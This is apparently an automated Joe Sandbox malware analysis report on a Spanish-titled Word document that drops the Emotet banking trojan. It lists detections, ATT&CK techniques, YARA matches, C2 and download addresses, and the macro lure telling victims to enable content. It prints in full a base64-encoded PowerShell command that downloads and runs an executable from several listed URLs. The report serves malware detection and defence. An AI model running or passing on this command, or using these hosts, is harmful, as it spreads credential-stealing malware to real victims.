Loading ...

Play interactive tourEdit tour

Analysis Report Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:212266
Start date:02.03.2020
Start time:18:05:07
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 46s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winDOC@8/17@2/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 89% (good quality ratio 85.7%)
  • Quality average: 77.5%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 88
  • Number of non-executed functions: 259
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation11Hidden Files and Directories1Valid Accounts1Disabling Security Tools1Input Capture1System Time Discovery2Remote File Copy3Input Capture1Data Encrypted11Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaPowerShell4Valid Accounts1Access Token Manipulation1Deobfuscate/Decode Files or Information11Network SniffingSecurity Software Discovery12Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting2Modify Existing Service11Process Injection11Scripting2Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API131New Service2New Service2Obfuscated Files or Information2Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessMasquerading221Account ManipulationSystem Information Discovery37Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceHidden Files and Directories1Brute ForceQuery Registry1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface113Path InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceService Execution12Logon ScriptsProcess InjectionVirtualization/Sandbox Evasion2Bash HistoryProcess Discovery2Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessAccess Token Manipulation1Input PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationProcess Injection11KeychainRemote System Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: khomaynhomnhua.vnGoogle Safe Browsing: Label: phishing
Source: http://khomaynhomnhua.vn/dup-installer/tyl31xi-nmfh-643542/Google Safe Browsing: Label: phishing
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\633.exeAvira: detection malicious, Label: TR/AD.Emotet.ervx
Antivirus detection for sampleShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docAvira: detection malicious, Label: VBA/Dldr.Agent.pucid
Found malware configurationShow sources
Source: inettimeout.exe.2312.6.memstrMalware Configuration Extractor: Emotet {"C2 list": ["42.115.22.145/jHnnLdTLu1NRMhU"]}
Multi AV Scanner detection for domain / URLShow sources
Source: khomaynhomnhua.vnVirustotal: Detection: 14%Perma Link
Source: http://khomaynhomnhua.vn/dup-installer/tyl31xi-nmfh-643542/Virustotal: Detection: 18%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\633.exeVirustotal: Detection: 79%Perma Link
Source: C:\Users\user\633.exeReversingLabs: Detection: 90%
Multi AV Scanner detection for submitted fileShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docVirustotal: Detection: 64%Perma Link
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docReversingLabs: Detection: 54%
Machine Learning detection for sampleShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\633.exeCode function: 4_2_003D207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,4_2_003D207B
Source: C:\Users\user\633.exeCode function: 4_2_003D1F11 CryptExportKey,4_2_003D1F11
Source: C:\Users\user\633.exeCode function: 4_2_003D1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_003D1F75
Source: C:\Users\user\633.exeCode function: 4_2_003D215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,4_2_003D215A
Source: C:\Users\user\633.exeCode function: 4_2_003D1F56 CryptGetHashParam,4_2_003D1F56
Source: C:\Users\user\633.exeCode function: 4_2_003D1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_003D1FFC
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,6_2_003B1F75
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_003B1FFC
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,6_2_003B207B
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1F11 CryptExportKey,6_2_003B1F11
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,6_2_003B215A
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1F56 CryptGetHashParam,6_2_003B1F56

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\633.exeCode function: 3_2_0042A28A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_0042A28A
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: luislar68.000webhostapp.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 145.14.144.203:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 145.14.144.203:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.2:49160 -> 42.115.22.145:80
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /dup-installer/tyl31xi-nmfh-643542/ HTTP/1.1Host: khomaynhomnhua.vnConnection: Keep-Alive
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 45.122.220.220 45.122.220.220
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 42.115.22.145
Source: unknownTCP traffic detected without corresponding DNS query: 42.115.22.145
Source: unknownTCP traffic detected without corresponding DNS query: 42.115.22.145
Source: unknownTCP traffic detected without corresponding DNS query: 42.115.22.145
Source: unknownTCP traffic detected without corresponding DNS query: 42.115.22.145
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1383 InternetReadFile,6_2_003B1383
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /dup-installer/tyl31xi-nmfh-643542/ HTTP/1.1Host: khomaynhomnhua.vnConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: luislar68.000webhostapp.com
Urls found in memory or binary dataShow sources
Source: inettimeout.exe, 00000006.00000002.1264757594.0027B000.00000004.00000020.sdmpString found in binary or memory: http://42.115.22.145/jHnnLdTLu1NRMhUpxrV
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49158
Source: unknownNetwork traffic detected: HTTP traffic on port 49158 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\633.exeCode function: 3_2_0042400F GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageA,GetCapture,PeekMessageA,PeekMessageA,PtInRect,GetTickCount,ReleaseCapture,3_2_0042400F
Source: C:\Users\user\633.exeCode function: 3_2_0041ED6E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_0041ED6E
Source: C:\Users\user\633.exeCode function: 3_2_0040F1B0 GetKeyState,InvalidateRect,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,GetKeyState,SendMessageA,SendMessageA,SendMessageA,InvalidateRect,SendMessageA,SendMessageA,3_2_0040F1B0

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\633.exeCode function: 4_2_003DE20C4_2_003DE20C
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003BE20C6_2_003BE20C
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABXAGEAcAB4AHAAZgBvAGsAPQAnAFQAawB4AHUAYwBjAGIAdQBzAHQAJwA7ACQASQB0AGEAYwBuAHUAbABxACAAPQAgACcANgAzADMAJwA7ACQAQwBhAGMAdABiAGgAawBrAHUAcABjAD0AJwBOAG0AdgB6AHUAdABzAGIAaQB4AHcAZgAnADsAJABEAHYAZABqAGwAZgBqAGUAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQB0AGEAYwBuAHUAbABxACsAJwAuAGUAeABlACcAOwAkAFMAcQB4AHIAbgBkAG0AbgB3AG4APQAnAEQAbQBhAHkAdQB1AG4AaABwAHAAegAnADsAJABCAHUAZwBsAHoAdABmAGQAaAA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAGUAQgBjAEwASQBFAE4AdAA7ACQARAB4AHkAZwBsAGcAeQBjAHUAawA9ACcAaAB0AHQAcABzADoALwAvAGwAdQBpAHMAbABhAHIANgA4AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgB4AHIANQB1AC0AMQB4AG8AZwAtADIAOQA1ADkANQAvACoAaAB0AHQAcAA6AC8ALwBrAGgAbwBtAGEAeQBuAGgAbwBtAG4AaAB1AGEALgB2AG4ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAB5AGwAMwAxAHgAaQAtAG4AbQBmAGgALQA2ADQAMwA1ADQAMgAvACoAaAB0AHQAcABzADoALwAvAGYAYQAuAGsAaABhAG4AbgBlAHMAaABpAG4AaABvAHQAZQBsAC4AaQByAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADQAdAAxAGwALQBhAHIAagB1AGIAZABtADMAOQBjAC0AMgA0ADIANgA0ADMAMwA3ADMAMQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAdAB0AGwAZQBnAHIAZQBlAG4AdwBoAGUAZQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyADAAcABhAHYAMAAtADkANQA3AC0AMQA0ADAAMgA3ADAAMAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAHIAYQB3AGQAYQBoAHQAcgB1AHMAdAAuAG8AcgBnAC8AcgBwAHIAbABxAC8AcwB4AHQAdABtAC0AaAB1AGcAcAB3AGgAMQAtADEANwAxAC8AJwAuACIAUwBgAHAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXAGEAbAB1AGQAZgBuAGIAdwByAHUAdwB4AD0AJwBJAGEAcABoAG4AaABxAGYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAdgB0AGUAdQBmAHcAbAAgAGkAbgAgACQARAB4AHkAZwBsAGcAeQBjAHUAawApAHsAdAByAHkAewAkAEIAdQBnAGwAegB0AGYAZABoAC4AIgBEAE8AdwBOAGwAYABPAGEAYABkAGYAYABpAGwAZQAiACgAJABKAHYAdABlAHUAZgB3AGwALAAgACQARAB2AGQAagBsAGYAagBlAHEAKQA7ACQARABiAHMAcwB2AGMAcQBlAHMAcQA9ACcAVAB0AGgAeQBsAGgAdgBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB2AGQAagBsAGYAagBlAHEAKQAuACIAbABFAG4AYABHAFQASAAiACAALQBnAGUAIAAyADEANgA0ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAEUAYABBAHQARQAiACgAJABEAHYAZABqAGwAZgBqAGUAcQApADsAJABKAHkAcABhAHIAZgByAGcAdQA9ACcAQQBlAHYAaQBiAG8AZABzAGYAeQAnADsAYgByAGUAYQBrADsAJABHAHYAegBwAHcAagBrAHUAaAA9ACcASQB1AGYAYwB6AHoAYgBrAGgAcQBpAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBmAGcAYwBqAHIAaABpAD0AJwBFAHMAcAB2AHgAagBwAGQAdAAnAA==
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\633.exeCode function: 4_2_003D1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_003D1F75
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B1F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,6_2_003B1F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 4Screenshot OCR: Enable content button. O Page, I of I I Words:O I I @13,2 100%e) A GE) a L@
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 0Screenshot OCR: Enable content button.
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 1Screenshot OCR: Enable content button.
Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 8Screenshot OCR: Enable content button. mj ,1
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\633.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2323
Contains functionality to delete servicesShow sources
Source: C:\Users\user\633.exeCode function: 4_2_003DE3D8 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,4_2_003DE3D8
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\633.exeCode function: 4_2_003D1D2B CreateProcessAsUserW,CreateProcessW,4_2_003D1D2B
Detected potential crypto functionShow sources
Source: C:\Users\user\633.exeCode function: 3_2_004302E03_2_004302E0
Source: C:\Users\user\633.exeCode function: 3_2_0043E2E73_2_0043E2E7
Source: C:\Users\user\633.exeCode function: 3_2_004205D63_2_004205D6
Source: C:\Users\user\633.exeCode function: 3_2_004307B33_2_004307B3
Source: C:\Users\user\633.exeCode function: 3_2_0042EAE53_2_0042EAE5
Source: C:\Users\user\633.exeCode function: 3_2_00430B873_2_00430B87
Source: C:\Users\user\633.exeCode function: 3_2_0043AC3F3_2_0043AC3F
Source: C:\Users\user\633.exeCode function: 3_2_0043EDFB3_2_0043EDFB
Source: C:\Users\user\633.exeCode function: 3_2_00438EC13_2_00438EC1
Source: C:\Users\user\633.exeCode function: 3_2_00440E813_2_00440E81
Source: C:\Users\user\633.exeCode function: 3_2_00430F933_2_00430F93
Source: C:\Users\user\633.exeCode function: 3_2_004371073_2_00437107
Source: C:\Users\user\633.exeCode function: 3_2_0043F33D3_2_0043F33D
Source: C:\Users\user\633.exeCode function: 3_2_004313B33_2_004313B3
Source: C:\Users\user\633.exeCode function: 3_2_0042D5303_2_0042D530
Source: C:\Users\user\633.exeCode function: 3_2_0043F87F3_2_0043F87F
Source: C:\Users\user\633.exeCode function: 3_2_0043B9E63_2_0043B9E6
Source: C:\Users\user\633.exeCode function: 3_2_0043FF433_2_0043FF43
Source: C:\Users\user\633.exeCode function: 3_2_002430E43_2_002430E4
Source: C:\Users\user\633.exeCode function: 3_2_002430E83_2_002430E8
Source: C:\Users\user\633.exeCode function: 3_2_002428C13_2_002428C1
Source: C:\Users\user\633.exeCode function: 3_2_002637A53_2_002637A5
Source: C:\Users\user\633.exeCode function: 3_2_002637A93_2_002637A9
Source: C:\Users\user\633.exeCode function: 3_2_00262F823_2_00262F82
Source: C:\Users\user\633.exeCode function: 4_2_003B30E84_2_003B30E8
Source: C:\Users\user\633.exeCode function: 4_2_003B30E44_2_003B30E4
Source: C:\Users\user\633.exeCode function: 4_2_003B28C14_2_003B28C1
Source: C:\Users\user\633.exeCode function: 4_2_003D37A94_2_003D37A9
Source: C:\Users\user\633.exeCode function: 4_2_003D37A54_2_003D37A5
Source: C:\Users\user\633.exeCode function: 4_2_003D2F824_2_003D2F82
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005B28C15_2_005B28C1
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005B30E85_2_005B30E8
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005B30E45_2_005B30E4
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005D2F825_2_005D2F82
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005D37A95_2_005D37A9
Source: C:\Windows\System32\inettimeout.exeCode function: 5_2_005D37A55_2_005D37A5
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_002030E46_2_002030E4
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_002030E86_2_002030E8
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_002028C16_2_002028C1
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B37A96_2_003B37A9
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B37A56_2_003B37A5
Source: C:\Windows\System32\inettimeout.exeCode function: 6_2_003B2F826_2_003B2F82
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Timmoxybbxqk, Function Document_openName: Document_open
Document contains embedded VBA macrosShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE indicator application name: unknown
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\633.exeCode function: String function: 0043024C appears 57 times
Source: C:\Users\user\633.exeCode function: String function: 0041C21C appears 33 times
Source: C:\Users\user\633.exeCode function: String function: 004011F0 appears 31 times
Source: C:\Users\user\633.exeCode function: String function: 0042FFFB appears 107 times
PE file contains strange resourcesShow sources
Source: 633.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 633.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 633.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature matchShow sources
Source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winDOC@8/17@2/3
Contains functionality to create servicesShow sources
Source: C:\Users\user\633.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003DE4A8
Source: C:\Windows\System32\inettimeout.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,6_2_003BE4A8
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\633.exeCode function: 3_2_00261943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_00261943
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\633.exeCode function: 3_2_00421455 FindResourceA,LoadResource,LockResource,FreeResource,3_2_00421455
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\633.exeCode function: 4_2_003DE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003DE4A8
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\633.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M949911AE
Source: C:\Windows\System32\inettimeout.exeMutant created: \BaseNamedObjects\Global\I949911AE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\633.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I949911AE
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5EDF.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE document summary: title field not present or empty
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE document summary: author field not present or empty
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docOLE document summary: edited time not present or 0
Found command line outputShow sources
